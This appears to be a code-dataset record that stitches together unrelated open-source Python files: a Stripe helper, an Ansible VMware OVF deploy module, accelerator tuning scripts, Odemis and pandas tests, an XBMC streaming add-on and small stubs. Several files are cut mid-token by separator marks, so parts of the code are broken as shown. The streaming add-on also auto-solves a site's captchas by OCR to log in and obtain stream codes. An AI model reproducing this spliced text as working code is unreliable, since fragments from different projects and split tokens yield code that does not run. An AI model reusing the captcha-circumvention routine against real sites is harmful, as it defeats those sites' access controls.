IdempotencyKey.objects.filter(created__lt=threshold).delete()
def convert_tstamp(response):
"""
Convert a Stripe API timestamp response (unix epoch) to a native datetime.
:rtype: datetime
"""
if response is None:
# Allow passing None to convert_tstamp()
return response
# Overrides the set timezone to UTC - I think...
tz = timezone.utc if settings.USE_TZ else None
return datetime.datetime.fromtimestamp(response, tz)
# TODO: Finish this.
CURRENCY_SIGILS = {
"CAD": "$",
"EUR": "€",
"GBP": "£",
"USD": "$",
}
def get_friendly_currency_amount(amount, currency):
currency = currency.upper()
sigil = CURRENCY_SIGILS.get(currency, "")
return "{sigil}{amount} {currency}".format(sigil=sigil, amount=amount, currency=currency)
class QuerySetMock(QuerySet):
"""
A mocked QuerySet class that does not handle updates.
Used by UpcomingInvoice.invoiceitems.
"""
@classmethod
def from_iterable(cls, model, iterable):
instance = cls(model)
instance._result_cache = list(iterable)
instance._prefetch_done = True
return instance
def _clone(self):
return self.__class__.from_iterable(self.model, self._result_cache)
def update(self):
return 0
def delete(self):
return 0
|
roadmapper/ansible
|
lib/ansible/modules/cloud/vmware/vmware_deploy_ovf.py
|
Python
|
gpl-3.0
| 22,956
| 0.002701
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Matt Martz <[email protected]>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
author: 'Matt Martz (@sivel)'
short_description: 'Deploys a VMware virtual machine from an OVF or OVA file'
description:
- 'This module can be used to deploy a VMware VM from an OVF or OVA file'
module: vmware_deploy_ovf
notes: []
options:
allow_duplicates:
default: "yes"
description:
- Whether or not to allow duplicate VM names. ESXi allows duplicates, vCenter may not.
type: bool
datacenter:
default: ha-datacenter
description:
- Datacenter to deploy to.
type: str
cluster:
description:
- Cluster to deploy to.
type: str
datastore:
default: datastore1
description:
- Datastore to deploy to.
- "You can also specify datastore storage cluster. version_added: 2.9"
type: str
deployment_option:
description:
- The key of the chosen deployment option.
type: str
disk_provisioning:
choices:
- flat
- eagerZeroedThick
- monolithicSparse
- twoGbMaxExtentSparse
- twoGbMaxExtentFlat
- thin
- sparse
- thick
- seSparse
- monolithicFlat
default: thin
description:
- Disk provisioning type.
type: str
fail_on_spec_warnings:
description:
- Cause the module to treat OVF Import Spec warnings as errors.
default: "no"
type: bool
folder:
description:
- Absolute path of folder to place the virtual machine.
- If not specified, defaults to the value of C(datacenter.vmFolder).
- 'Examples:'
- ' folder: /ha-datacenter/vm'
- ' folder: ha-datacenter/vm'
- ' folder: /datacenter1/vm'
- ' folder: datacenter1/vm'
- ' folder: /datacenter1/vm/folder1'
- ' folder: datacenter1/vm/folder1'
- ' folder: /folder1/datacenter1/vm'
- ' folder: folder1/datacenter1/vm'
- ' folder: /folder1/datacenter1/vm/folder2'
type: str
inject_ovf_env:
description:
- Force the given properties to be inserted into an OVF Environment and injected through VMware Tools.
version_added: "2.8"
type: bool
name:
description:
- Name of the VM to work with.
- Virtual machine names in vCenter are not necessarily unique, which may be problematic.
type: str
networks:
default:
VM Network: VM Network
description:
- 'C(key: value) mapping of OVF network name, to the vCenter network name.'
type: dict
ovf:
description:
- 'Path to OVF or OVA file to deploy.'
aliases:
- ova
power_on:
default: true
description:
- 'Whether or not to power on the virtual machine after creation.'
type: bool
properties:
description:
- The assignment of values to the properties found in the OVF as key value pairs.
type: dict
resource_pool:
default: Resources
description:
- Resource Pool to deploy to.
type: str
wait:
default: true
description:
- 'Wait for the host to power on.'
type: bool
wait_for_ip_address:
default: false
description:
- Wait until vCenter detects an IP address for the VM.
- This requires vmware-tools (vmtoolsd) to properly work after creation.
type: bool
requirements:
- pyvmomi
version_added: "2.7"
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- vmware_deploy_ovf:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
ovf: /path/to/ubuntu-16.04-amd64.ovf
wait_for_ip_address: true
delegate_to: localhost
# Deploys a new VM named 'NewVM' in specific datacenter/cluster, with network mapping taken from variable and using ova template from an absolute path
- vmware_deploy_ovf:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
datacenter: Datacenter1
cluster: Cluster1
datastore: vsandatastore
name: NewVM
networks: "{u'VM Network':u'{{ ProvisioningNetworkLabel }}'}"
validate_certs: no
power_on: no
ovf: /absolute/path/to/template/mytemplate.ova
delegate_to: localhost
'''
RETURN = r'''
instance:
description: metadata about the new virtual machine
returned: always
type: dict
sample: None
'''
import io
import os
import sys
import tarfile
import time
import traceback
import xml.etree.ElementTree as ET
from threading import Thread
from ansible.module_utils._text import to_native
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import string_types
from ansible.module_utils.urls import generic_urlparse, open_url, urlparse, urlunparse
from ansible.module_utils.vmware import (find_network_by_name, find_vm_by_name, PyVmomi,
gather_vm_facts, vmware_argument_spec, wait_for_task, wait_for_vm_ip)
try:
from ansible.module_utils.vmware import vim
from pyVmomi import vmodl
except ImportError:
pass
def path_exists(value):
if not isinstance(value, string_types):
value = str(value)
value = os.path.expanduser(os.path.expandvars(value))
if not os.path.exists(value):
raise ValueError('%s is not a valid path' % value)
return value
class ProgressReader(io.FileIO):
def __init__(self, name, mode='r', closefd=True):
self.bytes_read = 0
io.FileIO.__init__(self, name, mode=mode, closefd=closefd)
def read(self, size=10240):
chunk = io.FileIO.read(self, size)
self.bytes_read += len(chunk)
return chunk
class TarFileProgressReader(tarfile.ExFileObject):
def __init__(self, *args):
self.bytes_read = 0
tarfile.ExFileObject.__init__(self, *args)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
self.close()
except Exception:
pass
def read(self, size=10240):
chunk = tarfile.ExFileObject.read(self, size)
self.bytes_read += len(chunk)
return chunk
class VMDKUploader(Thread):
def __init__(self, vmdk, url, validate_certs=True, tarinfo=None, create=False):
Thread.__init__(self)
self.vmdk = vmdk
if tarinfo:
self.size = tarinfo.size
else:
self.size = os.stat(vmdk).st_size
self.url = url
self.validate_certs = validate_certs
self.tarinfo = tarinfo
self.f = None
self.e = None
self._create = create
@property
def bytes_read(self):
try:
return self.f.bytes_read
except AttributeError:
return 0
def _request_opts(self):
'''
Requests for vmdk files differ from other file types. Build the request options here to handle that
'''
headers = {
'Content-
|
Length': self.si
|
ze,
'Content-Type': 'application/octet-stream',
}
if self._create:
# Non-VMDK
method = 'PUT'
headers['Overwrite'] = 't'
else:
# VMDK
method = 'POST'
headers['Content-Type'] = 'application/x-vnd.vmware-streamVmdk'
return {
'method': method,
'headers': headers,
}
def _open_url(self):
open_url(self.url, data=self.f, validate_certs=self.validate_certs, **self._request_opts())
def run(self):
if self.tarinfo:
|
sserkez/ocelot
|
mint/flash_tune.py
|
Python
|
gpl-3.0
| 2,806
| 0.024947
|
'''
main tuning script, LCLS
'''
import numpy as np
from ocelot.mint.mint import Optimizer, Action
from ocelot.mint.flash1_interface import FLASH1MachineInterface, FLASH1DeviceProperties, TestInterface
mi = FLASH1MachineInterface()
dp = FLASH1DeviceProperties()
#opt = Optimizer(mi, dp)
opt = Optimizer(TestInterface(), dp)
opt.debug = True
opt.logging = True
opt.log_file = 'test.log'
opt.timeout = 1.2
seq1 = [Action(func=opt.max_sase, args=[ ['H10SMATCH','H12SMATCH'], 'simplex'] ) ]
seq2 = [Action(func=opt.max_sase, args=[ ['V14SMATCH','V7SMATCH'], 'simplex' ] )]
seq3 = [Action(func=opt.max_sase, args=[ ['V14SMATCH','V7SMATCH','H10SMATCH','H12SMATCH'], 'simplex' ] )]
seq4 = [Action(func=opt.max_sase, args=[ ['Q13SMATCH','Q15SMATCH'], 'simplex' ] )]
seq5 = [Action(func=opt.max_sase, args=[ ['H3DBC3','V3DBC3'], 'simplex' ] )]
seq6 = [Action(func=opt.max_sase, args=[ ['H3DBC3','V3DBC3','H10ACC7','V10ACC7'], 'simplex' ] )]
seq7 = [Action(func=opt.max_sase, args=[ ['Q5UND1.3.5','Q5UND2.4'], 'simplex' ] )]
seq8 = [Action(func=opt.max_sase, args=[ ['H3UND1','H3UND3','H3UND4','H3UND5'], 'simplex' ] )]
seq9 = [Action(func=opt.max_sase, args=[ ['H8TCOL','V8TCOL'], 'simplex' ] )]
seq10 = [Action(func=opt.max_sase, args=[ ['H3DBC3'], 'simplex' ] )]
seq0 = [Action(func=opt.max_sase, args=[ ['H10SMATCH','H12SMATCH'], 'cg', {'maxiter':15}] ),
Action(func=opt.max_sase, args=[ ['H10SMATCH','H12SMATCH'], 'simplex', {'maxiter':25}] )]
opt.eval(seq1)
"""
#import json
def get_dict(lat, bpms):
dict_bpms = {}
for elem in lat.sequence:
if elem.type == "monitor" and elem.mi_id in bpms:
dict_bpms[elem.mi_id] = {}
dict_bpms[elem.mi_id]["x"] = elem.x
dict_bpms[elem.mi_id]["y"] = elem.y
return dict_bpms
#dp = FLASH1DeviceProperties()
def apply_bump(names, currents, dIs, alpha):
mi.set_value(names, currents+dIs*alpha)
cors = ['H3DBC3', 'H10ACC4','H9ACC5', 'H10ACC5', 'H9ACC6', 'H10ACC6', 'H10ACC7']
dI = np.array([-0.0114768844711, -0.183727960466, 0.325959042831, 0.318743893708, 0.15280311903, 0.130996600233, -0.831909116508])
currents = np.array([ -0.0229914523661, 0.0250000003725, 0.985000014305, 0.0, -1.17299997807, 0.0, 0.148000001907])
bump = {"correctors":cors, "dI": dI, "currents":currents}
alpha = 0.1
seq_bump = [Action(func=opt.max_sase_bump, args=[ bump, alpha, 'simplex' ] )]
orbit = {}
orbit["correctors"] =
|
['H3SFELC', 'H4SFELC', 'H10SMATCH', 'D11SMATCH', 'H12SMATCH']
setup = log.MachineSetup()
#setup.save_lattice(lat, "init.txt")
lat_all = MagneticLattice(lattice)
setup.load_lattice("init.txt", lat_all)
or
|
bit["bpms"] = get_dict(lat, bpms)
seq_min_orb = [Action(func=opt.min_orbit, args=[orbit, 'simplex' ] )]
opt.eval(seq_bump)
apply_bump(cors, currents, dI, alpha=0.1)
"""
|
delmic/odemis
|
src/odemis/gui/conf/test/conf_test.py
|
Python
|
gpl-2.0
| 6,386
| 0.001097
|
# -*- coding: utf-8 -*-
"""
:created: 27 Aug 2014
:author: Éric Piel
:copyright: © 2014 Éric Piel, Delmic
This file is part of Odemis.
.. license::
Odemis is free software: you can redistribute it and/or modify it under the terms of the GNU
General Public License version 2 as published by the Free Software Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License along with Odemis. If not,
see http://www.gnu.org/licenses/.
"""
from __future__ import division
from past.builtins import basestring
import logging
import odemis.gui.conf.file as conffile
import odemis.gui as gui
from odemis.util import test
import os
import shutil
import unittest
from unittest.case import skip
logging.getLogger().setLevel(logging.DEBUG)
class ConfigTest(object):
""" Generic test setup/teardown methods for testing one configuration """
# .conf_class must be defined
def setUp(self):
# save the real user file to be able to do whatever we like
filename = os.path.join(conffile.CONF_PATH, self.conf_class.file_name)
backname = filename + u".testbak"
if os.path.exists(filename):
logging.info("Saving file %s", filename)
shutil.copy2(filename, backname)
self.backname = backname
else:
self.backname = None
self.filename = filename
def tearDown(self):
if self.backname:
logging.info("Restoring file %s", self.filename)
shutil.copy2(self.backname, self.filename)
else:
try:
os.remove(self.filename)
except OSError:
pass
else:
logging.info("Deleting test file %s", self.filename)
# Reset the module globals
gui.conf.CONF_GENERAL = None
gui.conf.CONF_ACQUI = None
gui.conf.CONF_CALIB = None
class GeneralConfigTest(ConfigTest, unittest.TestCase):
conf_class = gui.conf.file.GeneralConfig
def test_simple(self):
conf = gui.conf.get_general_conf()
path = conf.get_manual()
if path is not None:
self.assertTrue(os.path.exists(path))
path = conf.get_manual("secom")
if path is not None:
self.assertTrue(os.path.exists(path))
path = conf.get_dev_manual()
if path is not None:
self.assertTrue(os.path.exists(path))
def test_save(self):
conf = gui.conf.get_general_conf()
conf.set("calibration", "ar_file", u"booo")
# reset
del conf
gui.conf.CONF_GENERAL = None
conf = gui.conf.get_general_conf()
path = conf.get("calibration", "ar_file")
self.assertEqual(path, u"booo")
def test_save_unicode(self):
conf = gui.conf.get_general_conf()
conf.set("calibration", "ar_file", u"booµ")
# reset
del conf
gui.conf.CONF_GENERAL = None
conf = gui.conf.get_general_conf()
path = conf.get("calibration", "ar_file")
self.assertEqual(path, u"booµ")
def test_default(self):
try:
os.remove(self.filename)
except OSError:
pass
conf = gui.conf.get_general_conf()
path = conf.get("calibration", "ar_file")
self.assertEqual(path, u"")
path = conf.get("calibration", "spec_file")
self.assertEqual(path, u"")
path = conf.get_manual()
self.assertTrue(path.endswith(u".pdf"))
class AcquisitionConfigTest(ConfigTest, unittest.TestCase):
conf_class = gui.conf.file.AcquisitionConfig
def test_simple(self):
conf = gui.conf.get_acqui_conf()
self.assertIsInstance(conf.last_path, basestring)
self.assertIsInstance(conf.last_format, basestring)
self.assertLess(l
|
en(conf.last_extension), 12)
def test_save(self):
# Will fail if setting the properties goes wrong
conf = gui.conf.get_acqui_conf()
conf.last_path = u"/home/booo/"
conf.last_format = "HDF5"
conf.last_extension = ".h5"
conf.f
|
n_ptn = u"{timelng}-test {cnt}"
def test_save_unicode(self):
conf = gui.conf.get_acqui_conf()
conf.last_path = u"/home/boooµ/"
conf.last_format = "HDF5"
conf.last_extension = ".h5"
conf.fn_ptn = u"{timelng}-test {cnt} µm value"
class CalibrationConfigTest(ConfigTest, unittest.TestCase):
conf_class = gui.conf.file.CalibrationConfig
def test_simple(self):
conf = gui.conf.get_calib_conf()
# non existing id should return None
calib = conf.get_sh_calib(0)
self.assertIs(calib, None)
def test_save(self):
conf = gui.conf.get_calib_conf()
shid = 125166841353
# try with a bit annoying numbers
htop = (-0.5, 1e-6)
hbot = (5e9, -1.55158e-6)
hfoc = 0.006
ofoc = -0.001e-6
strans = (5.468e-3, -365e-6)
sscale = (1.1, 0.9)
srot = 0.1
iscale = (13.1, 13.1)
irot = 5.9606
iscale_xy = (1.01, 0.9)
ishear = 1.1
resa = (8.09, 2.16)
resb = (-157.5, -202.9)
hfwa = (-0.953, -0.009)
scaleshift = (0.029, -2.90e-05)
orig_calib = (htop, hbot, hfoc, ofoc, strans, sscale, srot, iscale, irot,
iscale_xy, ishear, resa, resb, hfwa, scaleshift)
conf.set_sh_calib(shid, *orig_calib)
# read back from memory
back_calib = conf.get_sh_calib(shid)
for o, b in zip(orig_calib, back_calib):
if isinstance(o, tuple):
test.assert_tuple_almost_equal(o, b)
else:
self.assertAlmostEqual(o, b)
# read back from file
del conf
gui.conf.CONF_CALIB = None
conf = gui.conf.get_calib_conf()
back_calib = conf.get_sh_calib(shid)
for o, b in zip(orig_calib, back_calib):
if isinstance(o, tuple):
test.assert_tuple_almost_equal(o, b)
else:
self.assertAlmostEqual(o, b)
if __name__ == "__main__":
unittest.main()
|
marcuschia/ShaniXBMCWork
|
other/livetvPlayer.py
|
Python
|
gpl-2.0
| 7,065
| 0.045294
|
# -*- coding: utf-8 -*-
import xbmc, xbmcgui, xbmcplugin
import urllib2,urllib,cgi, re
import HTMLParser
import xbmcaddon
import json
import traceback
import os
import cookielib
from BeautifulSoup import BeautifulStoneSoup, BeautifulSoup, BeautifulSOAP
import datetime
import sys
import time
import CustomPlayer
import captcha
__addon__ = xbmcaddon.Addon()
__addonname__ = __addon__.getAddonInfo('name')
__icon__ = __addon__.getAddonInfo('icon')
addon_id = 'plugin.video.shahidmbcnet'
selfAddon = xbmcaddon.Addon(id=addon_id)
addonPath = xbmcaddon.Addon().getAddonInfo("path")
addonArt = os.path.join(addonPath,'resources/images')
communityStreamPath = os.path.join(addonPath,'resources/community')
COOKIEFILE = communityStreamPath+'/livePlayerLoginCookie.lwp'
profile_path = xbmc.translatePath(selfAddon.getAddonInfo('profile'))
def PlayStream(sourceEtree, urlSoup, name, url):
try:
playpath=urlSoup.chnumber.text
pDialog = xbmcgui.DialogProgress()
pDialog.create('XBMC', 'Communicating with Livetv')
pDialog.update(40, 'Attempting to Login')
if shouldforceLogin():
if performLogin():
print 'done login'
print 'ooops'
code=getcode();
print 'firstCode',code
if 1==2 and not code or code[0:1]=="w":
pDialog.update(40, 'Refreshing Login')
code=getcode(True);
print 'secondCode',code
liveLink= sourceEtree.findtext('rtmpstring')
pDialog.update(80, 'Login Completed, now playing')
print 'rtmpstring',liveLink
#liveLink=liveLink%(playpath,match)
liveLink=liveLink%(playpath,code)
name+='-LiveTV'
print 'liveLink',liveLink
listitem = xbmcgui.ListItem( label = str(name), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=liveLink )
pDialog.close(
|
)
player = CustomPlayer.MyXBMCPlayer()
start = time.time()
#xbmc.Player().play( liveLink,listitem)
player.play( liveLink,listitem)
while player.is_active:
xbmc.sleep(200)
#return player.urlplayed
#done = time.time()
done = time.time()
elapsed = done - start
if player.urlplayed and elapsed>=3:
return True
else:
return False
except:
traceback.print_exc(file=sys.stdout)
return False
def getcode():
#url = urlSoup.url.text
cookieJar=getCookieJar()
|
link=getUrl('http://www.livetv.tn/index.php',cookieJar)
captcha=None
match =re.findall('<img src=\"(.*?)\" alt=\"CAPT', link)
if len(match)>0:
captcha="http://www.livetv.tn"+match[0]
else:
captcha=None
solution=None
if captcha:
local_captcha = os.path.join(profile_path, "captchaC.img" )
localFile = open(local_captcha, "wb")
localFile.write(getUrl(captcha,cookieJar))
localFile.close()
cap=parseCaptcha(local_captcha)
print 'parsed cap',cap
if cap=="" or not len(cap)==3:
solver = InputWindow(captcha=local_captcha)
solution = solver.get()
else:
solution=cap
if solution:
#do captcha post
post={'capcode':solution}
post = urllib.urlencode(post)
link=getUrl("http://www.livetv.tn/",cookieJar,post)
code =re.findall('code=(.*?)[\'\"]', link)[0]
return code
def parseCaptcha(filePath):
retVal=""
try:
print 'the val is'
retVal=captcha.getString(filePath)
print 'the val is',retVal
except: traceback.print_exc(file=sys.stdout)
return retVal
def getUrl(url, cookieJar=None,post=None):
cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
#opener = urllib2.install_opener(opener)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
response = opener.open(req,post)
link=response.read()
response.close()
return link;
def getCookieJar():
cookieJar=None
try:
cookieJar = cookielib.LWPCookieJar()
cookieJar.load(COOKIEFILE,ignore_discard=True)
except:
cookieJar=None
if not cookieJar:
cookieJar = cookielib.LWPCookieJar()
return cookieJar
def performLogin():
cookieJar=cookielib.LWPCookieJar()
html_text=getUrl("http://www.livetv.tn/login.php",cookieJar)
cookieJar.save (COOKIEFILE,ignore_discard=True)
print 'cookie jar saved',cookieJar
match =re.findall('<img src=\"(.*?)\" alt=\"Cap', html_text)
if len(match)>0:
captcha="http://www.livetv.tn/"+match[0]
else:
captcha=None
if captcha:
local_captcha = os.path.join(profile_path, "captcha.img" )
localFile = open(local_captcha, "wb")
localFile.write(getUrl(captcha,cookieJar))
localFile.close()
cap=parseCaptcha(local_captcha)
print 'login parsed cap',cap
if cap=="" or not len(cap)==4:
solver = InputWindow(captcha=local_captcha)
solution = solver.get()
else:
solution=cap
if solution or captcha==None:
print 'performing login'
userName=selfAddon.getSetting( "liveTvLogin" )
password=selfAddon.getSetting( "liveTvPassword")
if captcha:
post={'pseudo':userName,'epass':password,'capcode':solution}
else:
post={'pseudo':userName,'epass':password}
post = urllib.urlencode(post)
getUrl("http://www.livetv.tn/login.php",cookieJar,post)
return shouldforceLogin(cookieJar)==False
else:
return False
def shoudforceLogin2():
try:
# import dateime
lastUpdate=selfAddon.getSetting( "lastLivetvLogin" )
print 'lastUpdate',lastUpdate
do_login=False
now_datetime=datetime.datetime.now()
if lastUpdate==None or lastUpdate=="":
do_login=True
else:
print 'lastlogin',lastUpdate
try:
lastUpdate=datetime.datetime.strptime(lastUpdate,"%Y-%m-%d %H:%M:%S")
except TypeError:
lastUpdate = datetime.datetime.fromtimestamp(time.mktime(time.strptime(lastUpdate, "%Y-%m-%d %H:%M:%S")))
t=(now_datetime-lastUpdate).seconds/60
print 'lastUpdate',lastUpdate,now_datetime
print 't',t
if t>15:
do_login=True
print 'do_login',do_login
return do_login
except:
traceback.print_exc(file=sys.stdout)
return True
def shouldforceLogin(cookieJar=None):
try:
url="http://www.livetv.tn/index.php"
if not cookieJar:
cookieJar=getCookieJar()
html_txt=getUrl(url,cookieJar)
if '<a href="http://www.livetv.tn/login.php">' in html_txt:
return True
else:
return False
except:
traceback.print_exc(file=sys.stdout)
return True
class InputWindow(xbmcgui.WindowDialog):
def __init__(self, *args, **kwargs):
self.cptloc = kwargs.get('captcha')
self.img = xbmcgui.ControlImage(335,30,624,60,self.cptloc)
self.addControl(self.img)
self.kbd = xbmc.Keyboard()
def get(self):
self.show()
time.sleep(3)
self.kbd.doModal()
if (self.kbd.isConfirmed()):
text = self.kbd.getText()
self.close()
return text
self.close()
return False
|
Chasego/codirit
|
jiuzhang/Nine Chapters/3 Binary Tree & Divide Conquer/py/BalancedBinaryTree_rec.py
|
Python
|
mit
| 873
| 0.001145
|
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
"""
@param root: The root of binary tree.
@return: True if this Binary tree is Balanced, or false.
"""
def isBalanced(self, root):
# write your code here
isbalanced, h = self.isBalancedandHeight(root)
return isbalanced
def isBalancedandHeight(self, root):
|
if root is None:
return True, 0
l, r = root.left, root.right
l_balanced, l_h =
|
self.isBalancedandHeight(l)
if not l_balanced:
return False, 0
r_balanced, r_h = self.isBalancedandHeight(r)
if not r_balanced:
return False, 0
if abs(l_h - r_h) < 2:
return True, max(l_h, r_h) + 1
return False, 0
|
scribusproject/scribus-tools
|
resource-checker/scribus-services-check.py
|
Python
|
gpl-3.0
| 408
| 0.009804
|
# This script will check http://services.scribus.net for broken assets
import lxml.html
url = "http://services.scribus.net"
doc = lxml.ht
|
ml.parse(url)
# pattern matching for relative urls: <a href="scribus_fonts.xml">
content_parsed = doc.xpath('href')
# also ignore scribusversions.xml
# Create a scraper class to feed .xml page results to
# Create a function that mails an admin when a r
|
esult 404s
|
jreback/pandas
|
pandas/tests/indexing/test_datetime.py
|
Python
|
bsd-3-clause
| 7,714
| 0.001037
|
import numpy as np
import pytest
import pandas as pd
from pandas import DataFrame, Index, Series, Timestamp, date_range
import pandas._testing as tm
class TestDatetimeIndex:
def test_indexing_with_datetime_tz(self):
# GH#8260
# support datetime64 with tz
idx = Index(date_range("20130101", periods=3, tz="US/Eastern"), name="foo")
dr = date_range("20130110", periods=3)
df = DataFrame({"A": idx, "B": dr})
df["C"] = idx
df.iloc[1, 1] = pd.NaT
df.iloc[1, 2] = pd.NaT
# indexing
result = df.iloc[1]
expected = Series(
[Timestamp("2013-01-02 00:00:00-0500", tz="US/Eastern"), pd.NaT, pd.NaT],
index=list("ABC"),
dtype="object",
name=1,
)
tm.assert_series_equal(result, expected)
result = df.loc[1]
expected = Series(
[Timestamp("2013-01-02 00:00:00-0500", tz="US/Eastern"), pd.NaT, pd.NaT],
index=list("ABC"),
dtype="object",
name=1,
)
tm.assert_series_equal(result, expected)
# indexing - fast_xs
df = DataFrame({"a": date_range("2014-01-01", periods=10, tz="UTC")})
result = df.iloc[5]
expected = Series(
[Timestamp("2014-01-06 00:00:00+0000", tz="UTC")], index=["a"], name=5
)
tm.assert_series_equal(result, expected)
result = df.loc[5]
tm.assert_series_equal(result, expected)
# indexing - boolean
result = df[df.a > df.a[3]]
expected = df.iloc[4:]
tm.assert_frame_equal(result, expected)
# indexing - setting an element
df = DataFrame(
data=pd.to_datetime(["2015-03-30 20:12:32", "2015-03-12 00:11:11"]),
columns=["time"],
)
df["new_col"] = ["new", "old"]
df.time = df.set_index("time").index.tz_localize("UTC")
v = df[df.new_col == "new"].set_index("time").index.tz_convert("US/Pacific")
# trying to set a single element on a part of a different timezone
# this converts to object
df2 = df.copy()
df2.loc[df2.new_col == "new", "time"] = v
expected = Series([v[0], df.loc[1, "time"]], name="time")
tm.assert_series_equal(df2.time, expected)
v = df.loc[df.new_col == "new", "time"] + pd.Timedelta("1s")
df.loc[df.new_col == "new", "time"] = v
tm.assert_series_equal(df.loc[df.new_col == "new", "time"], v)
def test_consistency_with_tz_aware_scalar(self):
# xef gh-12938
# various ways of indexing the same tz-aware scalar
df = Series([Timestamp("2016-03-30 14:35:25", tz="Europe/Brussels")]).to_frame()
df = pd.concat([df, df]).reset_index(drop=True)
expected = Timestamp("2016-03-30 14:35:25+0200", tz="Europe/Brussels")
result = df[0][0]
assert result == expected
result = df.iloc[0, 0]
assert result == expected
result = df.loc[0, 0]
assert result == expected
result = df.iat[0, 0]
assert result == expected
result = df.at[0, 0]
assert result == expected
result = df[0].loc[0]
assert result == expected
result = df[0].at[0]
assert result == expected
def test_indexing_with_datetimeindex_tz(self):
# GH 12050
# indexing on a series with a datetimeindex with tz
index = date_range("2015-01-01", periods=2, tz="utc")
ser = Series(range(2), index=index, dtype="int64")
# list-like indexing
for sel in (index, list(index)):
# getitem
result = ser[sel]
expected = ser.copy()
if sel is not index:
expected.index = expected.index._with_freq(None)
tm.assert_series_equal(result, expected)
# setitem
result = ser.copy()
result[sel] = 1
expected = Series(1, index=index)
tm.assert_series_equal(result, expected)
# .loc getitem
result = ser.loc[sel]
expected = ser.copy()
if sel is not index:
expected.index = expected.index._with_freq(None)
tm.assert_series_equal(result, expected)
# .loc setitem
result = ser.copy()
result.loc[sel] = 1
expected = Series(1, index=index)
tm.assert_series_equal(result, expected)
# single element indexing
# getitem
assert ser[index[1]] == 1
# setitem
result = ser.copy()
result[index[1]] = 5
expected = Series([0, 5], index=index)
tm.assert_series_equal(result, expected)
# .loc getitem
assert ser.loc[index[1]] == 1
# .loc setitem
result = ser.copy()
result.loc[index[1]] = 5
expected = Series([0, 5], index=index)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("to_period", [True, False])
def test_loc_getitem_listlike_of_datetimelike_keys(self, to_period):
# GH 11497
idx = date_range("2011-01-01", "2011-01-02", freq="D", name="idx")
if to_period:
idx = idx.to_period("D")
ser = Series([0.1, 0.2], index=idx, name="s")
keys = [Timestamp("2011-01-01"), Timestamp("2011-01-02")]
if to_period:
keys = [x.to_period("D") for x in keys]
result = ser.loc[keys]
exp = Series([0.1, 0.2], index=idx, name="s")
if not to_period:
exp.index = exp.index._with_freq(None)
tm.assert_series_equal(result, exp, check_index_type=True)
keys = [
Times
|
tamp("2011-01-02"),
Timestamp(
|
"2011-01-02"),
Timestamp("2011-01-01"),
]
if to_period:
keys = [x.to_period("D") for x in keys]
exp = Series(
[0.2, 0.2, 0.1], index=Index(keys, name="idx", dtype=idx.dtype), name="s"
)
result = ser.loc[keys]
tm.assert_series_equal(result, exp, check_index_type=True)
keys = [
Timestamp("2011-01-03"),
Timestamp("2011-01-02"),
Timestamp("2011-01-03"),
]
if to_period:
keys = [x.to_period("D") for x in keys]
with pytest.raises(KeyError, match="with any missing labels"):
ser.loc[keys]
def test_nanosecond_getitem_setitem_with_tz(self):
# GH 11679
data = ["2016-06-28 08:30:00.123456789"]
index = pd.DatetimeIndex(data, dtype="datetime64[ns, America/Chicago]")
df = DataFrame({"a": [10]}, index=index)
result = df.loc[df.index[0]]
expected = Series(10, index=["a"], name=df.index[0])
tm.assert_series_equal(result, expected)
result = df.copy()
result.loc[df.index[0], "a"] = -1
expected = DataFrame(-1, index=index, columns=["a"])
tm.assert_frame_equal(result, expected)
def test_loc_setitem_with_existing_dst(self):
# GH 18308
start = Timestamp("2017-10-29 00:00:00+0200", tz="Europe/Madrid")
end = Timestamp("2017-10-29 03:00:00+0100", tz="Europe/Madrid")
ts = Timestamp("2016-10-10 03:00:00", tz="Europe/Madrid")
idx = pd.date_range(start, end, closed="left", freq="H")
result = DataFrame(index=idx, columns=["value"])
result.loc[ts, "value"] = 12
expected = DataFrame(
[np.nan] * len(idx) + [12],
index=idx.append(pd.DatetimeIndex([ts])),
columns=["value"],
dtype=object,
)
tm.assert_frame_equal(result, expected)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.